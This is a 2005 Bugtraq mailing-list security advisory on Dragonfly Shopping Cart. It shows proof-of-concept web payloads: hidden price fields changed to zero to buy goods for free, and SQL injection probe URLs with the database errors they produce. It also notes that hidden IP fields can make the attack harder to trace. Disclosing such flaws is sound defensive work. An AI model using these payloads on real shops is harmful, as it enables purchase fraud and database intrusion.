[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Dragonfly Shopping Cart Multiple vulnerabilities
From:       dcrab () hackerscenter ! com
Date:       2005-07-12 8:53:52
Message-ID: 20050712085352.13762.qmail () securityfocus ! com
[Download RAW message or body]

Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc or even code \
them. Learn more at http://www.dbtech.org

Severity: High
Title: Dragonfly Shopping Cart Multiple vulnerabilities
Date: 11/07/2005

Vendor: DragonFly Shopping Cart
Vendor Website: http://www.incredibleinteractive.com/Active/dc_Productsview.asp?key=5
Summary: Vulnerabilities exist in Dragonfly Shopping Cart that allow modifiying of \
prices along with Sql injection vulnerabilities.

Proof of Concept Exploits:

Hidden Price Value Vulnerability
You can modify these fields to modify the price of the product and thus be able to \
purchase the biggest and most expensive products for the cheapest possible prices, or \
                even nothing.
/demo/dc_Categorieslist.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="15.49" size="4">



/demo/dc_Categoriesview.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">



/demo/dc_productslist.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">



/demo/dc_productslist_Clearance.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">


There are also many other hidden fields like ip address etc which can be used to make \
the attack "technically" more anonymous though any normal logging system would catch \
you ;).



Sql Injections

/demo/dc_Categoriesview.asp??key='&RecPerPage=5

Microsoft JET Database Engine error '80040e07' 

Data type mismatch in criteria expression. 

/demo/dc_Categoriesview.asp, line 1054 



/demo/dc_Categoriesview.asp?key=%26dir%26
Microsoft JET Database Engine error '80040e14' 

Syntax error (missing operator) in query expression '[CategoryKey] = &dir&'. 

/demo/dc_Categoriesview.asp, line 1054 



/demo/dc_productslist_Clearance.asp

Microsoft JET Database Engine error '80040e14' 

Syntax error in string in query expression '([ProductActive] = 'show' AND \
([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND \
ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR \
[ProductDescriptionShort] LIKE '%1%') ' ))'. 

/demo/dc_productslist_Clearance.asp, line 292 



/demo/dc_productslist_Clearance.asp?cmd=%27

Microsoft JET Database Engine error '80040e14' 

Syntax error in string in query expression '([ProductActive] = 'show' AND \
([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND \
ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR \
[ProductDescriptionShort] LIKE '%1%') ' ))'. 

/demo/dc_productslist_Clearance.asp, line 292 



/demo/ratings.asp??PID='

Microsoft JET Database Engine error '80040e14' 

Syntax error (missing operator) in query expression '[ProductKey]=''. 

/demo/ratings.asp, line 68 



/demo/dc_Productsview.asp

Microsoft JET Database Engine error '80040e07' 

Data type mismatch in criteria expression. 

/demo/dc_Productsview.asp, line 931 



/demo/dc_forum_Postslist.asp?start='

Microsoft VBScript runtime error '800a000d' 

Type mismatch: 'nTotalRecs' 

/demo/dc_forum_Postslist.asp, line 319 



/demo/dc_forum_Postslist.asp?key_m='

Microsoft JET Database Engine error '80040e07' 

Data type mismatch in criteria expression. 

/demo/dc_forum_Postslist.asp, line 200 



/demo/dc_forum_Postslist.asp?psearch=1&Submit=Search%20%28%2A%29&psearchtype='

Microsoft JET Database Engine error '80040e07' 

Data type mismatch in criteria expression. 

/demo/dc_forum_Postslist.asp, line 200 



/demo/dc_forum_Postslist.asp?psearch='&Submit=Search%20%28%2A%29&psearchtype=1

Microsoft JET Database Engine error '80040e07' 

Data type mismatch in criteria expression. 

/demo/dc_forum_Postslist.asp, line 200 


Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: \
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me \
regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or \
http://icis.digitalparadox.org/~dcrab. Lookout for my soon to come out book on Secure \
coding with php.


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic